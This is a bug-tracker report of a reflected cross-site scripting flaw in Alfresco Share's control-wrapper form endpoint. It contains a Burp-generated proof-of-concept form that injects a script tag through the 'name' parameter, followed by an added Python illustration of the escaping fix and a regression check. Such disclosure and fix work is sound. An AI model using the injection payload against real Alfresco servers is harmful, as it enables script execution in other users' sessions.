ACE-5670 (Alfresco One Platform)

Escaping is incorrect on /share/service/components/form/control-wrapper


      Description

      When security testing with the CSRF protection disabled, Burp Suite Pro detects reflected XSS in the form /share/service/components/form/control-wrapper; this indicates that the escaping of reflected content on this page is incorrect.

      Burp Suite reports that the displayMode JSON parameter, the name parameter, and the value parameter are susceptible to reflected XSS; the default CSRF proof-of-concept code for the name parameter is below. They all do look exploitable, but I only demonstrated it on the "name" parameter.

      With CSRF protection enabled the issue is not obviously exploitable without another hack to obtain a CSRF token (when worse things can probably be done), hence the low security rating assigned.

      At this time I haven't looked for other methods of exploitation which might make this error more important.

      To reproduce, use a browser with no XSS auditor, or with the auditor disabled.
      Disable CSRF protection in Alfresco.
      Adjust the code below for your Alfresco Share server, open the file and submit the form request.

      <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <!-- Attribute values are HTML-entity encoded so the browser submits the quote and tag characters literally instead of parsing them as markup of this page -->
      <body>
      <form action="http://192.168.56.103:8080/share/service/components/form/control-wrapper" method="POST">
      <input type="hidden" name="htmlid" value="alf-id0" />
      <input type="hidden" name="type" value="association" />
      <input type="hidden" name="name" value="payloadnzmia&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;rn78f" />
      <input type="hidden" name="label" value="Source Items" />
      <input type="hidden" name="value" value="" />
      <input type="hidden" name="controlParams" value="{&quot;displayMode&quot;:&quot;list&quot;,&quot;multipleSelectMode&quot;:true}" />
      <input type="hidden" name="field" value="{}" />
      <input type="submit" value="Submit request" />
      </form>
      </body>
      </html>
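The escaping defect the report describes, as an added example in Python that is neither Alfresco code nor the reporter's: a hypothetical stand-in renderer that concatenates the name, value and controlParams JSON into the page the way the bug does, beside a context-aware fixed version, and a regression check that reports which of the three parameters still reflect the alert(1) marker unencoded. The renderer's markup, the `alf-id0`/`Source Items` sample values and the probe string are constructed for the example.

```python
import html
import json

# Constructed marker modelled on the reporter's alert(1) probe (not Alfresco code).
PROBE = 'payload"><script>alert(1)</script>'
MARKER = '<script>alert(1)</script>'

def render_vulnerable(htmlid, name, label, value, control_params):
    # Hypothetical stand-in for the defect class in the report: request parameters
    # are concatenated straight into HTML attributes and into an inline JSON config.
    return (
        f'<div id="{htmlid}" class="form-field">'
        f'<label for="{htmlid}-{name}">{label}</label>'
        f'<input id="{htmlid}-{name}" name="{name}" value="{value}" />'
        f'<script>var params = {control_params};</script></div>'
    )

def render_fixed(htmlid, name, label, value, control_params):
    # Encode for the context each value lands in: entity-encode (quotes included) for
    # attributes and text; for the inline-script config, parse the JSON, re-serialise
    # it and escape '<' / '>' so a "</script>" inside a string cannot close the block.
    def esc(s):
        return html.escape(str(s), quote=True)
    params = json.loads(control_params)  # malformed JSON is rejected, not reflected
    safe_json = json.dumps(params).replace("<", "\\u003c").replace(">", "\\u003e")
    return (
        f'<div id="{esc(htmlid)}" class="form-field">'
        f'<label for="{esc(htmlid)}-{esc(name)}">{esc(label)}</label>'
        f'<input id="{esc(htmlid)}-{esc(name)}" name="{esc(name)}" value="{esc(value)}" />'
        f'<script>var params = {safe_json};</script></div>'
    )

def check_endpoint(renderer):
    """Exercise name, value and displayMode (inside the controlParams JSON) as the
    report lists them; return the parameters whose probe comes back unencoded."""
    leaks = []
    for param in ("name", "value", "displayMode"):
        args = dict(htmlid="alf-id0", name="assoc", label="Source Items", value="",
                    control_params='{"displayMode":"list","multipleSelectMode":true}')
        if param == "displayMode":
            args["control_params"] = json.dumps({"displayMode": PROBE, "multipleSelectMode": True})
        else:
            args[param] = PROBE
        if MARKER in renderer(**args):  # marker survived byte-for-byte: reflected XSS
            leaks.append(param)
    return leaks
```

Running `check_endpoint` against a real response body (captured with CSRF protection off, as in the report) instead of the stand-in renderer turns it into a regression test for the fix.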

            Assignee: Closed Issues
            Reporter: Simon Waters